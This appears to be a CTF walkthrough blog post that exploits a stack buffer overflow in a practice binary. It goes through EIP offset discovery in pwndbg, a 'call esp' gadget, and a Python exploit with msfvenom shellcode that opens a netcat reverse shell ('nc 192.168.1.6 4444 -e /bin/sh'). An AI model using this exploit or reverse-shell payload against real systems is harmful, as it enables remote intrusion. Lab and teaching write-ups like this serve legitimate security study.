First, I have downloaded the application, then I will give the execute permission so that I can run the application as below.
$ chmod +x vulnerableapp2
After that I will try to run as usual, running binary applications on Linux.
It turns out to have an error with wrong segmentation, then I will try to give a basic input of 4 bytes, namely "AAAA", as below:
$ ./vulnerableapp2 AAAA
The result of this is that the application can run normally and does not get an error alert like at the beginning. Ok, now we will give input that exceeds the memory storage limit used by the application.
It can be seen that our input succeeded in making the application over or crash, here I use the python script input by giving 800 bytes of the letter A character, here is the source command:
$ ./vulnerableapp2 `python -c 'print "A" * 800'`
I have gotten info that 800 bytes of input can cause the application to crash, now let's test using debugging, here I use pwndbg if you don't have it or have trouble installing it, you can check my previous post.
We have entered the debugger and we will focus here on seeing changes to the Extended Stack Pointer (ESP), Extended Base Pointer (EBP), Extended Instruction pointer (EIP) registers.
Please note that each register function that we use refers to the running of our exploit later, such as:
- Extended Stack Pointer(ESP) we will see a pointer or data stack pointer stored in memory that is used to process the application..
- Extended Base Pointer(EBP) here we will see the memory address that shows the location of the parameters of a function and also variables in a running program.
- Extended Instruction pointer(EIP) in used as a pointer that will indicate to the cpu the memory location that stores the next command that will be executed by the CPU.
Now we will try to retest by running a python script in the debugger which will give input of 800 bytes.
pwndbg> run `msf-pattern_create -l 800`
Starting program: /home/dig/CTF/soal2Excode/vulnerableapp2 `msf-pattern_create -l 800`
pwndbg> info registers eip
eip 0x35784134 0x35784134
pwndbg> exit
Undefined command: "exit". Try "help".
pwndbg>
zsh: suspended pwngdb ./vulnerableapp2
┌──(root💀dig)-[/home/dig/CTF/soal2Excode]
└─# msf-pattern_offset -q 0x35784134 148 ⨯ 1 ⚙
[*] Exact match at offset 704
#!/usr/bin/python
import struct
fuzz = "A" * 704
eip = struct.pack("<I", ini diisi dengan registry call esp pada aplikasi)
nop = "\x90" * 8
- import struct and the variable eip is filled with struct.pack which is used to read our text format to match the architecture format at the memory address using little endian.
- then in nop this is the no operation variable, which we will set with 8 bytes "\x90" will be filled in.
pwndbg> ropgadget --grep "call esp"
Saved corefile /tmp/tmp7twt6z73
0xffffc4eb : call esp
#!/usr/bin/python
import struct
fuzz = "A" * 704
eip = struct.pack("<I",
0xffffc4eb
)
nop = "\x90" * 8
$ msfvenom -a x86 --platform linux -p linux/x86/exec CMD="nc 192.168.1.6 4444 -e /bin/sh" LHOST=192.168.1.6 LPORT=4444 -b "\x20\x0a\x0d\x00\x3f" -f python -v shellcode
#!/usr/bin/python
import struct
fuzz = "A" * 704
eip = struct.pack("<I",
0xffffc4eb
)
nop = "\x90" * 8
shellcode = b""
shellcode += b"\xb8\xa7\x29\xb5\x66\xdb\xcb\xd9\x74\x24\xf4"
shellcode += b"\x5a\x31\xc9\xb1\x11\x31\x42\x14\x83\xc2\x04"
shellcode += b"\x03\x42\x10\x45\xdc\xdf\x6d\xd1\x86\x72\x14"
shellcode += b"\x89\x95\x11\x51\xae\x8e\xfa\x12\x58\x4f\x6d"
shellcode += b"\xfa\xfa\x26\x03\x8d\x19\xea\x33\x92\xdd\x0b"
shellcode += b"\xc4\xc3\xbe\x2b\xf5\x22\x72\x02\xc4\x62\x4a"
shellcode += b"\x74\x17\xa5\x9c\xa8\x63\x8d\xd4\x9c\xab\xc0"
shellcode += b"\x71\xfd\x84\x78\x10\x93\xf5\x0f\x8a\x6b\x5d"
shellcode += b"\xa3\xc3\x8d\xac\xc3"
print fuzz + eip + nop + shellcode
pwndbg> ropgadget --grep "call esp"
Saved corefile
/tmp/tmp7twt6z73
: call esp
0xffffc4eb
pwndbg> break *
Breakpoint 1 at
0xffffc4eb
pwndbg> run `python exploit.py`
0xffffc4eb
After this we continue with the command:
pwndbg> x/100x $esp
pwndbg> x/100bx $esp
It will appear like this, then we will match the shellcode with the hex shellcode in stack memory.
0 Comments